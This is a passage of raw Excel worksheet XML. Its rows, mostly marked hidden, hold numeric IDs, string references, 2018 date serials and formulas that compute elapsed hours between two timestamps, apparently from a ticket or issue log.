      <c r="F1355" s="1">
        <v>43361.720694444448</v>
      </c>
      <c r="G1355" t="s">
        <v>474</v>
      </c>
      <c r="H1355" t="str">
        <f>TEXT(F1355-E1355,"[h]")</f>
        <v>142</v>
      </c>
    </row>
    <row r="1356" spans="1:8" hidden="1">
      <c r="A1356" t="s">
        <v>3720</v>
      </c>
      <c r="B1356">
        <v>11935</v>
      </c>
      <c r="C1356" t="s">
        <v>3721</v>
      </c>
      <c r="D1356" t="s">
        <v>7</v>
      </c>
      <c r="E1356" s="1">
        <v>43355.724618055552</v>
      </c>
      <c r="F1356" s="1">
        <v>43361.093171296299</v>
      </c>
      <c r="G1356" t="s">
        <v>1302</v>
      </c>
      <c r="H1356" t="str">
        <f>TEXT(F1356-E1356,"[h]")</f>
        <v>128</v>
      </c>
    </row>
    <row r="1357" spans="1:8" hidden="1">
      <c r="A1357" t="s">
        <v>3722</v>
      </c>
      <c r="B1357">
        <v>11934</v>
      </c>
      <c r="C1357" t="s">
        <v>3723</v>
      </c>
      <c r="D1357" t="s">
        <v>7</v>
      </c>
      <c r="E1357" s="1">
        <v>43355.683668981481</v>
      </c>
      <c r="F1357" s="1">
        <v>43355.703252314815</v>
      </c>
      <c r="G1357" t="s">
        <v>1305</v>
      </c>
      <c r="H1357" t="str">
        <f>TEXT(F1357-E1357,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1358" spans="1:8" hidden="1">
      <c r="A1358" t="s">
        <v>3724</v>
      </c>
      <c r="B1358">
        <v>11933</v>
      </c>
      <c r="C1358" t="s">
        <v>3725</v>
      </c>
      <c r="D1358" t="s">
        <v>7</v>
      </c>
      <c r="E1358" s="1">
        <v>43355.351701388892</v>
      </c>
      <c r="F1358" s="1">
        <v>43356.117800925924</v>
      </c>
      <c r="G1358" t="s">
        <v>55</v>
      </c>
      <c r="H1358" t="str">
        <f>TEXT(F1358-E1358,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1359" spans="1:8" hidden="1">
      <c r="A1359" t="s">
        <v>3726</v>
      </c>
      <c r="B1359">
        <v>11932</v>
      </c>
      <c r="C1359" t="s">
        <v>3727</v>
      </c>
      <c r="D1359" t="s">
        <v>7</v>
      </c>
      <c r="E1359" s="1">
        <v>43355.178715277776</v>
      </c>
      <c r="F1359" s="1">
        <v>43356.934374999997</v>
      </c>
      <c r="G1359" t="s">
        <v>28</v>
      </c>
      <c r="H1359" t="str">
        <f>TEXT(F1359-E1359,"[h]")</f>
        <v>42</v>
      </c>
    </row>
    <row r="1360" spans="1:8" hidden="1">
      <c r="A1360" t="s">
        <v>3728</v>
      </c>
      <c r="B1360">
        <v>11931</v>
      </c>
      <c r="C1360" t="s">
        <v>3729</v>
      </c>
      <c r="D1360" t="s">
        <v>7</v>
      </c>
      <c r="E1360" s="1">
        <v>43355.043738425928</v>
      </c>
      <c r="F1360" s="1">
        <v>43539.942754629628</v>
      </c>
      <c r="G1360" t="s">
        <v>3730</v>
      </c>
      <c r="H1360" t="str">
        <f>TEXT(F1360-E1360,"[h]")</f>
        <v>4437</v>
      </c>
    </row>
    <row r="1361" spans="1:8" hidden="1">
      <c r="A1361" t="s">
        <v>3731</v>
      </c>
      <c r="B1361">
        <v>11930</v>
      </c>
      <c r="C1361" t="s">
        <v>3732</v>
      </c>
      <c r="D1361" t="s">
        <v>7</v>
      </c>
      <c r="E1361" s="1">
        <v>43354.54314814815</v>
      </c>
      <c r="F1361" s="1">
        <v>43354.615972222222</v>
      </c>
      <c r="G1361" t="s">
        <v>51</v>
      </c>
      <c r="H1361" t="str">
        <f>TEXT(F1361-E1361,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1362" spans="1:8">
      <c r="A1362" t="s">
        <v>3733</v>
      </c>
      <c r="B1362">
        <v>11927</v>
      </c>
      <c r="C1362" t="s">
        <v>3734</v>
      </c>
      <c r="D1362" t="s">
        <v>7</v>
      </c>
      <c r="E1362" s="1">
        <v>43353.91233796296</v>
      </c>
      <c r="F1362" s="1">
        <v>43530.395300925928</v>
      </c>
      <c r="G1362" t="s">
        <v>2271</v>
      </c>
      <c r="H1362" t="str">
        <f>TEXT(F1362-E1362,"[h]")</f>
        <v>4235</v>
      </c>
    </row>
    <row r="1363" spans="1:8" hidden="1">
      <c r="A1363" t="s">
        <v>3735</v>
      </c>
      <c r="B1363">
        <v>11926</v>
      </c>
      <c r="C1363" t="s">
        <v>3736</v>
      </c>
      <c r="D1363" t="s">
        <v>7</v>
      </c>
      <c r="E1363" s="1">
        <v>43353.742881944447</v>
      </c>
      <c r="F1363" s="1">
        <v>43355.244884259257</v>
      </c>
      <c r="G1363" t="s">
        <v>1465</v>
      </c>
      <c r="H1363" t="str">
        <f>TEXT(F1363-E1363,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="1364" spans="1:8" hidden="1">
      <c r="A1364" t="s">
        <v>3737</v>
      </c>
      <c r="B1364">
        <v>11922</v>
      </c>
      <c r="C1364" t="s">
        <v>3738</v>
      </c>
      <c r="D1364" t="s">
        <v>7</v>
      </c>
      <c r="E1364" s="1">
        <v>43353.023518518516</v>
      </c>
      <c r="F1364" s="1">
        <v>43353.858437499999</v>
      </c>
      <c r="G1364" t="s">
        <v>1681</v>
      </c>
      <c r="H1364" t="str">
        <f>TEXT(F1364-E1364,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1365" spans="1:8" hidden="1">
      <c r="A1365" t="s">
        <v>3739</v>
      </c>
      <c r="B1365">
        <v>11921</v>
      </c>
      <c r="C1365" t="s">
        <v>3740</v>
      </c>
      <c r="D1365" t="s">
        <v>7</v>
      </c>
      <c r="E1365" s="1">
        <v>43352.962256944447</v>
      </c>
      <c r="F1365" s="1">
        <v>43354.627372685187</v>
      </c>
      <c r="G1365" t="s">
        <v>28</v>
      </c>
      <c r="H1365" t="str">
        <f>TEXT(F1365-E1365,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1366" spans="1:8" hidden="1">
      <c r="B1366">
        <v>11920</v>
      </c>
      <c r="C1366" t="s">
        <v>3741</v>
      </c>
      <c r="D1366" t="s">
        <v>7</v>
      </c>
      <c r="E1366" s="1">
        <v>43352.936874999999</v>
      </c>
      <c r="F1366" s="1">
        <v>43352.997974537036</v>
      </c>
      <c r="G1366" t="s">
        <v>1681</v>
      </c>
      <c r="H1366" t="str">
        <f>TEXT(F1366-E1366,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1367" spans="1:8" hidden="1">
      <c r="A1367" t="s">
        <v>3742</v>
      </c>
      <c r="B1367">
        <v>11916</v>
      </c>
      <c r="C1367" t="s">
        <v>3743</v>
      </c>
      <c r="D1367" t="s">
        <v>7</v>
      </c>
      <c r="E1367" s="1">
        <v>43352.3121875</v>
      </c>
      <c r="F1367" s="1">
        <v>43414.088391203702</v>
      </c>
      <c r="G1367" t="s">
        <v>536</v>
      </c>
      <c r="H1367" t="str">
        <f>TEXT(F1367-E1367,"[h]")</f>
        <v>1482</v>
      </c>
    </row>
    <row r="1368" spans="1:8" hidden="1">
      <c r="A1368" t="s">
        <v>3744</v>
      </c>
      <c r="B1368">
        <v>11915</v>
      </c>
      <c r="C1368" t="s">
        <v>3745</v>
      </c>
      <c r="D1368" t="s">
        <v>7</v>
      </c>
      <c r="E1368" s="1">
        <v>43352.203252314815</v>
      </c>
      <c r="F1368" s="1">
        <v>43377.841099537036</v>
      </c>
      <c r="G1368" t="s">
        <v>55</v>
      </c>
      <c r="H1368" t="str">
        <f>TEXT(F1368-E1368,"[h]")</f>
        <v>615</v>
      </c>
    </row>
    <row r="1369" spans="1:8" hidden="1">
      <c r="A1369" t="s">
        <v>3746</v>
      </c>
      <c r="B1369">
        <v>11914</v>
      </c>
      <c r="C1369" t="s">
        <v>3747</v>
      </c>
      <c r="D1369" t="s">
        <v>7</v>
      </c>
      <c r="E1369" s="1">
        <v>43351.951643518521</v>
      </c>
      <c r="F1369" s="1">
        <v>43353.914004629631</v>
      </c>
      <c r="G1369" t="s">
        <v>51</v>
      </c>
      <c r="H1369" t="str">
        <f>TEXT(F1369-E1369,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="1370" spans="1:8" hidden="1">
      <c r="A1370" t="s">
        <v>3748</v>
      </c>
      <c r="B1370">
        <v>11912</v>
      </c>
      <c r="C1370" t="s">
        <v>3749</v>
      </c>
      <c r="D1370" t="s">
        <v>7</v>
      </c>
      <c r="E1370" s="1">
        <v>43351.903148148151</v>
      </c>
      <c r="F1370" s="1">
        <v>43352.546840277777</v>
      </c>
      <c r="G1370" t="s">
        <v>3750</v>
      </c>
      <c r="H1370" t="str">
        <f>TEXT(F1370-E1370,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1371" spans="1:8" hidden="1">
      <c r="A1371" t="s">
        <v>3751</v>
      </c>
      <c r="B1371">
        <v>11910</v>
      </c>
      <c r="C1371" t="s">
        <v>3752</v>
      </c>
      <c r="D1371" t="s">
        <v>7</v>
      </c>
      <c r="E1371" s="1">
        <v>43351.740949074076</v>
      </c>
      <c r="F1371" s="1">
        <v>43360.256053240744</v>
      </c>
      <c r="G1371" t="s">
        <v>3753</v>
      </c>
      <c r="H1371" t="str">
        <f>TEXT(F1371-E1371,"[h]")</f>
        <v>204</v>
      </c>
    </row>
    <row r="1372" spans="1:8" hidden="1">
      <c r="A1372" t="s">
        <v>3754</v>
      </c>
      <c r="B1372">
        <v>11909</v>
      </c>
      <c r="C1372" t="s">
        <v>3755</v>
      </c>
      <c r="D1372" t="s">
        <v>7</v>
      </c>
      <c r="E1372" s="1">
        <v>43351.728414351855</v>
      </c>
      <c r="F1372" s="1">
        <v>43354.653287037036</v>
      </c>
      <c r="G1372" t="s">
        <v>28</v>
      </c>
      <c r="H1372" t="str">
        <f>TEXT(F1372-E1372,"[h]")</f>
        <v>70</v>
      </c>
    </row>
    <row r="1373" spans="1:8" hidden="1">
      <c r="A1373" t="s">
        <v>3756</v>
      </c>
      <c r="B1373">
        <v>11907</v>
      </c>
      <c r="C1373" t="s">
        <v>3757</v>
      </c>
      <c r="D1373" t="s">
        <v>7</v>
      </c>
      <c r="E1373" s="1">
        <v>43350.90121527778</v>
      </c>
      <c r="F1373" s="1">
        <v>43351.083368055559</v>
      </c>
      <c r="G1373" t="s">
        <v>445</v>
      </c>
      <c r="H1373" t="str">
        <f>TEXT(F1373-E1373,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1374" spans="1:8" hidden="1">
      <c r="A1374" t="s">
        <v>3758</v>
      </c>
      <c r="B1374">
        <v>11906</v>
      </c>
      <c r="C1374" t="s">
        <v>3759</v>
      </c>
      <c r="D1374" t="s">
        <v>7</v>
      </c>
      <c r="E1374" s="1">
        <v>43350.861087962963</v>
      </c>
      <c r="F1374" s="1">
        <v>43351.706712962965</v>
      </c>
      <c r="G1374" t="s">
        <v>55</v>
      </c>
      <c r="H1374" t="str">
        <f>TEXT(F1374-E1374,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1375" spans="1:8" hidden="1">
      <c r="A1375" t="s">
        <v>3760</v>
      </c>
      <c r="B1375">
        <v>11905</v>
      </c>
      <c r="C1375" t="s">
        <v>3761</v>
      </c>
      <c r="D1375" t="s">
        <v>7</v>
      </c>
      <c r="E1375" s="1">
        <v>43350.725949074076</v>
      </c>
      <c r="F1375" s="1">
        <v>43367.723692129628</v>
      </c>
      <c r="G1375" t="s">
        <v>3762</v>
      </c>
      <c r="H1375" t="str">
        <f>TEXT(F1375-E1375,"[h]")</f>
        <v>407</v>
      </c>
    </row>
    <row r="1376" spans="1:8" hidden="1">
      <c r="A1376" t="s">
        <v>3765</v>
      </c>
      <c r="B1376">
        <v>11901</v>
      </c>
      <c r="C1376" t="s">
        <v>3766</v>
      </c>
      <c r="D1376" t="s">
        <v>7</v>
      </c>
      <c r="E1376" s="1">
        <v>43350.041458333333</v>
      </c>
      <c r="F1376" s="1">
        <v>43358.826412037037</v>
      </c>
      <c r="G1376" t="s">
        <v>1302</v>
      </c>
      <c r="H1376" t="str">
        <f>TEXT(F1376-E1376,"[h]")</f>
        <v>210</v>
      </c>
    </row>
    <row r="1377" spans="1:8" hidden="1">
      <c r="A1377" t="s">
        <v>3767</v>
      </c>
      <c r="B1377">
        <v>11900</v>
      </c>
      <c r="C1377" t="s">
        <v>3768</v>
      </c>
      <c r="D1377" t="s">
        <v>7</v>
      </c>
      <c r="E1377" s="1">
        <v>43350.039918981478</v>
      </c>
      <c r="F1377" s="1">
        <v>43353.857002314813</v>
      </c>
      <c r="G1377" t="s">
        <v>1302</v>
      </c>
      <c r="H1377" t="str">
        <f>TEXT(F1377-E1377,"[h]")</f>
        <v>91</v>
      </c>
    </row>
    <row r="1378" spans="1:8" hidden="1">
      <c r="A1378" t="s">
        <v>3769</v>
      </c>
      <c r="B1378">
        <v>11899</v>
      </c>
      <c r="C1378" t="s">
        <v>3770</v>
      </c>
      <c r="D1378" t="s">
        <v>7</v>
      </c>
      <c r="E1378" s="1">
        <v>43350.03701388889</v>
      </c>
      <c r="F1378" s="1">
        <v>43354.030729166669</v>
      </c>
      <c r="G1378" t="s">
        <v>1302</v>
      </c>
      <c r="H1378" t="str">
        <f>TEXT(F1378-E1378,"[h]")</f>
        <v>95</v>
      </c>
    </row>
    <row r="1379" spans="1:8" hidden="1">
      <c r="A1379" t="s">
        <v>3771</v>
      </c>
      <c r="B1379">
        <v>11898</v>
      </c>
      <c r="C1379" t="s">
        <v>3772</v>
      </c>
      <c r="D1379" t="s">
        <v>7</v>
      </c>
      <c r="E1379" s="1">
        <v>43350.034560185188</v>
      </c>
      <c r="F1379" s="1">
        <v>43419.128576388888</v>
      </c>
      <c r="G1379" t="s">
        <v>1302</v>
      </c>
      <c r="H1379" t="str">
        <f>TEXT(F1379-E1379,"[h]")</f>
        <v>1658</v>
      </c>
    </row>
    <row r="1380" spans="1:8">
      <c r="A1380" t="s">
        <v>3763</v>
      </c>
      <c r="B1380">
        <v>11896</v>
      </c>
      <c r="C1380" t="s">
        <v>3764</v>
      </c>
      <c r="D1380" t="s">
        <v>7</v>
      </c>
      <c r="E1380" s="1">
        <v>43349.864814814813</v>
      </c>
      <c r="F1380" s="1">
        <v>43350.019317129627</v>
      </c>
      <c r="G1380" t="s">
        <v>106</v>
      </c>
      <c r="H1380" t="str">
        <f>TEXT(F1380-E1380,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1381" spans="1:8" hidden="1">
      <c r="A1381" t="s">
        <v>3773</v>
      </c>
      <c r="B1381">
        <v>11895</v>
      </c>
      <c r="C1381" t="s">
        <v>3774</v>
      </c>
      <c r="D1381" t="s">
        <v>7</v>
      </c>
      <c r="E1381" s="1">
        <v>43349.384548611109</v>
      </c>
      <c r="F1381" s="1">
        <v>43349.702592592592</v>
      </c>
      <c r="G1381" t="s">
        <v>2780</v>
      </c>
      <c r="H1381" t="str">
        <f>TEXT(F1381-E1381,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1382" spans="1:8" hidden="1">
      <c r="A1382" t="s">
        <v>3775</v>
      </c>
      <c r="B1382">
        <v>11894</v>
      </c>
      <c r="C1382" t="s">
        <v>3776</v>
      </c>
      <c r="D1382" t="s">
        <v>7</v>
      </c>
      <c r="E1382" s="1">
        <v>43349.322002314817</v>
      </c>
      <c r="F1382" s="1">
        <v>43365.662164351852</v>
      </c>
      <c r="G1382" t="s">
        <v>2909</v>
      </c>
      <c r="H1382" t="str">
        <f>TEXT(F1382-E1382,"[h]")</f>
        <v>392</v>
      </c>
    </row>
    <row r="1383" spans="1:8" hidden="1">
      <c r="A1383" t="s">
        <v>3777</v>
      </c>
      <c r="B1383">
        <v>11892</v>
      </c>
      <c r="C1383" t="s">
        <v>3778</v>
      </c>
      <c r="D1383" t="s">
        <v>7</v>
      </c>
      <c r="E1383" s="1">
        <v>43349.193229166667</v>
      </c>
      <c r="F1383" s="1">
        <v>43349.243391203701</v>
      </c>
      <c r="G1383" t="s">
        <v>55</v>
      </c>
      <c r="H1383" t="str">
        <f>TEXT(F1383-E1383,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1384" spans="1:8" hidden="1">
      <c r="A1384" t="s">
        <v>3779</v>
      </c>
      <c r="B1384">
        <v>11891</v>
      </c>
      <c r="C1384" t="s">
        <v>3780</v>
      </c>
      <c r="D1384" t="s">
        <v>7</v>
      </c>
      <c r="E1384" s="1">
        <v>43349.022199074076</v>
      </c>
      <c r="F1384" s="1">
        <v>43354.207754629628</v>
      </c>
      <c r="G1384" t="s">
        <v>1302</v>
      </c>
      <c r="H1384" t="str">
        <f>TEXT(F1384-E1384,"[h]")</f>
        <v>124</v>
      </c>
    </row>
    <row r="1385" spans="1:8" hidden="1">
      <c r="A1385" t="s">
        <v>3781</v>
      </c>
      <c r="B1385">
        <v>11889</v>
      </c>
      <c r="C1385" t="s">
        <v>3782</v>
      </c>
      <c r="D1385" t="s">
        <v>7</v>
      </c>
      <c r="E1385" s="1">
        <v>43348.78833333333</v>
      </c>
      <c r="F1385" s="1">
        <v>43365.664594907408</v>
      </c>
      <c r="G1385" t="s">
        <v>3690</v>
      </c>
      <c r="H1385" t="str">
        <f>TEXT(F1385-E1385,"[h]")</f>
        <v>405</v>
      </c>
    </row>
    <row r="1386" spans="1:8" hidden="1">
      <c r="A1386" t="s">
        <v>3783</v>
      </c>
      <c r="B1386">
        <v>11888</v>
      </c>
      <c r="C1386" t="s">
        <v>3784</v>
      </c>
      <c r="D1386" t="s">
        <v>7</v>
      </c>
      <c r="E1386" s="1">
        <v>43348.729004629633</v>
      </c>
      <c r="F1386" s="1">
        <v>43459.937094907407</v>
      </c>
      <c r="G1386" t="s">
        <v>3785</v>
      </c>
      <c r="H1386" t="str">
        <f>TEXT(F1386-E1386,"[h]")</f>
        <v>2668</v>
      </c>
    </row>
    <row r="1387" spans="1:8" hidden="1">
      <c r="A1387" t="s">
        <v>3786</v>
      </c>
      <c r="B1387">
        <v>11885</v>
      </c>
      <c r="C1387" t="s">
        <v>3787</v>
      </c>
      <c r="D1387" t="s">
        <v>7</v>
      </c>
      <c r="E1387" s="1">
        <v>43348.384259259263</v>
      </c>
      <c r="F1387" s="1">
        <v>43560.306550925925</v>
      </c>
      <c r="G1387" t="s">
        <v>3788</v>
      </c>
      <c r="H1387" t="str">
        <f>TEXT(F1387-E1387,"[h]")</f>
        <v>5086</v>
      </c>
    </row>
    <row r="1388" spans="1:8" hidden="1">
      <c r="A1388" t="s">
        <v>3789</v>
      </c>
      <c r="B1388">
        <v>11882</v>
      </c>
      <c r="C1388" t="s">
        <v>3790</v>
      </c>
      <c r="D1388" t="s">
        <v>7</v>
      </c>
      <c r="E1388" s="1">
        <v>43348.259606481479</v>
      </c>
      <c r="F1388" s="1">
        <v>43351.712476851855</v>
      </c>
      <c r="G1388" t="s">
        <v>66</v>
      </c>
      <c r="H1388" t="str">
        <f>TEXT(F1388-E1388,"[h]")</f>
        <v>82</v>
      </c>
    </row>
    <row r="1389" spans="1:8">
      <c r="A1389" t="s">
        <v>3791</v>
      </c>
      <c r="B1389">
        <v>11880</v>
      </c>
      <c r="C1389" t="s">
        <v>3792</v>
      </c>
      <c r="D1389" t="s">
        <v>7</v>
      </c>
      <c r="E1389" s="1">
        <v>43347.681562500002</v>
      </c>
      <c r="F1389" s="1">
        <v>43348.403738425928</v>
      </c>
      <c r="G1389" t="s">
        <v>19</v>
      </c>
      <c r="H1389" t="str">
        <f>TEXT(F1389-E1389,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="1390" spans="1:8">
      <c r="A1390" t="s">
        <v>3793</v>
      </c>
      <c r="B1390">
        <v>11877</v>
      </c>
      <c r="C1390" t="s">
        <v>3794</v>
      </c>
      <c r="D1390" t="s">
        <v>7</v>
      </c>
      <c r="E1390" s="1">
        <v>43347.370046296295</v>
      </c>
      <c r="F1390" s="1">
        <v>43353.691701388889</v>
      </c>
      <c r="G1390" t="s">
        <v>697</v>
      </c>
      <c r="H1390" t="str">
        <f>TEXT(F1390-E1390,"[h]")</f>
        <v>151</v>
      </c>
    </row>
    <row r="1391" spans="1:8" hidden="1">
      <c r="A1391" t="s">
        <v>1772</v>
      </c>
      <c r="B1391">
        <v>11872</v>
      </c>
      <c r="C1391" t="s">
        <v>3795</v>
      </c>
      <c r="D1391" t="s">
        <v>7</v>
      </c>
      <c r="E1391" s="1">
        <v>43346.890405092592</v>
      </c>
      <c r="F1391" s="1">
        <v>43358.61204861111</v>
      </c>
      <c r="G1391" t="s">
        <v>3404</v>
      </c>
      <c r="H1391" t="str">
        <f>TEXT(F1391-E1391,"[h]")</f>
        <v>281</v>
      </c>
    </row>
    <row r="1392" spans="1:8" hidden="1">
      <c r="A1392" t="s">
        <v>3796</v>
      </c>
      <c r="B1392">
        <v>11868</v>
      </c>
      <c r="C1392" t="s">
        <v>3797</v>
      </c>
      <c r="D1392" t="s">
        <v>7</v>
      </c>
      <c r="E1392" s="1">
        <v>43346.09170138889</v>
      </c>
      <c r="F1392" s="1">
        <v>43346.562256944446</v>
      </c>
      <c r="G1392" t="s">
        <v>174</v>
      </c>
      <c r="H1392" t="str">
        <f>TEXT(F1392-E1392,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1393" spans="1:8" hidden="1">
      <c r="A1393" t="s">
        <v>3798</v>
      </c>
      <c r="B1393">
        <v>11866</v>
      </c>
      <c r="C1393" t="s">
        <v>3799</v>
      </c>
      <c r="D1393" t="s">
        <v>7</v>
      </c>
      <c r="E1393" s="1">
        <v>43344.985173611109</v>
      </c>
      <c r="F1393" s="1">
        <v>43345.818761574075</v>
      </c>
      <c r="G1393" t="s">
        <v>55</v>
      </c>
      <c r="H1393" t="str">
        <f>TEXT(F1393-E1393,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1394" spans="1:8" hidden="1">
      <c r="A1394" t="s">
        <v>3800</v>
      </c>
      <c r="B1394">
        <v>11865</v>
      </c>
      <c r="C1394" t="s">
        <v>3801</v>
      </c>
      <c r="D1394" t="s">
        <v>7</v>
      </c>
      <c r="E1394" s="1">
        <v>43344.970439814817</v>
      </c>
      <c r="F1394" s="1">
        <v>43345.120358796295</v>
      </c>
      <c r="G1394" t="s">
        <v>66</v>
      </c>
      <c r="H1394" t="str">
        <f>TEXT(F1394-E1394,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1395" spans="1:8" hidden="1">
      <c r="A1395" t="s">
        <v>3802</v>
      </c>
      <c r="B1395">
        <v>11864</v>
      </c>
      <c r="C1395" t="s">
        <v>3803</v>
      </c>
      <c r="D1395" t="s">
        <v>7</v>
      </c>
      <c r="E1395" s="1">
        <v>43344.808321759258</v>
      </c>
      <c r="F1395" s="1">
        <v>43344.880393518521</v>
      </c>
      <c r="G1395" t="s">
        <v>55</v>
      </c>
      <c r="H1395" t="str">
        <f>TEXT(F1395-E1395,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1396" spans="1:8">
      <c r="A1396" t="s">
        <v>3804</v>
      </c>
      <c r="B1396">
        <v>11862</v>
      </c>
      <c r="C1396" t="s">
        <v>3805</v>
      </c>
      <c r="D1396" t="s">
        <v>7</v>
      </c>
      <c r="E1396" s="1">
        <v>43344.735567129632</v>
      </c>
      <c r="F1396" s="1">
        <v>43344.801122685189</v>
      </c>
      <c r="G1396" t="s">
        <v>1669</v>
      </c>
      <c r="H1396" t="str">
        <f>TEXT(F1396-E1396,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1397" spans="1:8" hidden="1">
      <c r="A1397" t="s">
        <v>1772</v>
      </c>
      <c r="B1397">
        <v>11861</v>
      </c>
      <c r="C1397" t="s">
        <v>3806</v>
      </c>
      <c r="D1397" t="s">
        <v>7</v>
      </c>
      <c r="E1397" s="1">
        <v>43344.723368055558</v>
      </c>
      <c r="F1397" s="1">
        <v>43344.903124999997</v>
      </c>
      <c r="G1397" t="s">
        <v>3404</v>
      </c>
      <c r="H1397" t="str">
        <f>TEXT(F1397-E1397,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1398" spans="1:8">
      <c r="A1398" t="s">
        <v>3807</v>
      </c>
      <c r="B1398">
        <v>11859</v>
      </c>
      <c r="C1398" t="s">
        <v>3808</v>
      </c>
      <c r="D1398" t="s">
        <v>7</v>
      </c>
      <c r="E1398" s="1">
        <v>43344.57576388889</v>
      </c>
      <c r="F1398" s="1">
        <v>43630.772731481484</v>
      </c>
      <c r="G1398" t="s">
        <v>3809</v>
      </c>
      <c r="H1398" t="str">
        <f>TEXT(F1398-E1398,"[h]")</f>
        <v>6868</v>
      </c>
    </row>
    <row r="1399" spans="1:8" hidden="1">
      <c r="A1399" t="s">
        <v>3810</v>
      </c>
      <c r="B1399">
        <v>11858</v>
      </c>
      <c r="C1399" t="s">
        <v>3811</v>
      </c>
      <c r="D1399" t="s">
        <v>7</v>
      </c>
      <c r="E1399" s="1">
        <v>43344.502465277779</v>
      </c>
      <c r="F1399" s="1">
        <v>43361.825046296297</v>
      </c>
      <c r="G1399" t="s">
        <v>255</v>
      </c>
      <c r="H1399" t="str">
        <f>TEXT(F1399-E1399,"[h]")</f>
        <v>415</v>
      </c>
    </row>
    <row r="1400" spans="1:8" hidden="1">
      <c r="A1400" t="s">
        <v>3812</v>
      </c>
      <c r="B1400">
        <v>11856</v>
      </c>
      <c r="C1400" t="s">
        <v>3813</v>
      </c>
      <c r="D1400" t="s">
        <v>7</v>
      </c>
      <c r="E1400" s="1">
        <v>43344.387974537036</v>
      </c>
      <c r="F1400" s="1">
        <v>43383.688981481479</v>
      </c>
      <c r="G1400" t="s">
        <v>258</v>
      </c>
      <c r="H1400" t="str">
        <f>TEXT(F1400-E1400,"[h]")</f>
        <v>943</v>
      </c>
    </row>
    <row r="1401" spans="1:8" hidden="1">
      <c r="A1401" t="s">
        <v>3814</v>
      </c>
      <c r="B1401">
        <v>11855</v>
      </c>
      <c r="C1401" t="s">
        <v>3815</v>
      </c>
      <c r="D1401" t="s">
        <v>7</v>
      </c>
      <c r="E1401" s="1">
        <v>43344.37259259259</v>
      </c>
      <c r="F1401" s="1">
        <v>43377.717604166668</v>
      </c>
      <c r="G1401" t="s">
        <v>55</v>
      </c>
      <c r="H1401" t="str">
        <f>TEXT(F1401-E1401,"[h]")</f>
        <v>800</v>
      </c>
    </row>
    <row r="1402" spans="1:8">
      <c r="A1402" t="s">
        <v>3816</v>
      </c>
      <c r="B1402">
        <v>11852</v>
      </c>
      <c r="C1402" t="s">
        <v>3817</v>
      </c>
      <c r="D1402" t="s">
        <v>7</v>
      </c>
      <c r="E1402" s="1">
        <v>43344.020914351851</v>
      </c>
      <c r="F1402" s="1">
        <v>43392.68141203704</v>
      </c>
      <c r="G1402" t="s">
        <v>16</v>
      </c>
      <c r="H1402" t="str">
        <f>TEXT(F1402-E1402,"[h]")</f>
        <v>1167</v>
      </c>
    </row>
    <row r="1403" spans="1:8" hidden="1">
      <c r="A1403" t="s">
        <v>3818</v>
      </c>
      <c r="B1403">
        <v>11851</v>
      </c>
      <c r="C1403" t="s">
        <v>3819</v>
      </c>
      <c r="D1403" t="s">
        <v>7</v>
      </c>
      <c r="E1403" s="1">
        <v>43343.942395833335</v>
      </c>
      <c r="F1403" s="1">
        <v>43539.878009259257</v>
      </c>
      <c r="G1403" t="s">
        <v>37</v>
      </c>
      <c r="H1403" t="str">
        <f>TEXT(F1403-E1403,"[h]")</f>
        <v>4702</v>
      </c>
    </row>
    <row r="1404" spans="1:8" hidden="1">
      <c r="A1404" t="s">
        <v>3820</v>
      </c>
      <c r="B1404">
        <v>11850</v>
      </c>
      <c r="C1404" t="s">
        <v>3821</v>
      </c>
      <c r="D1404" t="s">
        <v>7</v>
      </c>
      <c r="E1404" s="1">
        <v>43343.83929398148</v>
      </c>
      <c r="F1404" s="1">
        <v>43343.856979166667</v>
      </c>
      <c r="G1404" t="s">
        <v>916</v>
      </c>
      <c r="H1404" t="str">
        <f>TEXT(F1404-E1404,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1405" spans="1:8" hidden="1">
      <c r="A1405" t="s">
        <v>3822</v>
      </c>
      <c r="B1405">
        <v>11849</v>
      </c>
      <c r="C1405" t="s">
        <v>3823</v>
      </c>
      <c r="D1405" t="s">
        <v>7</v>
      </c>
      <c r="E1405" s="1">
        <v>43343.768634259257</v>
      </c>
      <c r="F1405" s="1">
        <v>43343.836342592593</v>
      </c>
      <c r="G1405" t="s">
        <v>1185</v>
      </c>
      <c r="H1405" t="str">
        <f>TEXT(F1405-E1405,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1406" spans="1:8" hidden="1">
      <c r="A1406" t="s">
        <v>3824</v>
      </c>
      <c r="B1406">
        <v>11847</v>
      </c>
      <c r="C1406" t="s">
        <v>3825</v>
      </c>
      <c r="D1406" t="s">
        <v>7</v>
      </c>
      <c r="E1406" s="1">
        <v>43343.325555555559</v>
      </c>
      <c r="F1406" s="1">
        <v>43346.144363425927</v>
      </c>
      <c r="G1406" t="s">
        <v>118</v>
      </c>
      <c r="H1406" t="str">
        <f>TEXT(F1406-E1406,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="1407" spans="1:8" hidden="1">
      <c r="A1407" t="s">
        <v>3826</v>
      </c>
      <c r="B1407">
        <v>11843</v>
      </c>
      <c r="C1407" t="s">
        <v>3827</v>
      </c>
      <c r="D1407" t="s">
        <v>7</v>
      </c>
      <c r="E1407" s="1">
        <v>43343.057210648149</v>
      </c>
      <c r="F1407" s="1">
        <v>43347.237476851849</v>
      </c>
      <c r="G1407" t="s">
        <v>1205</v>
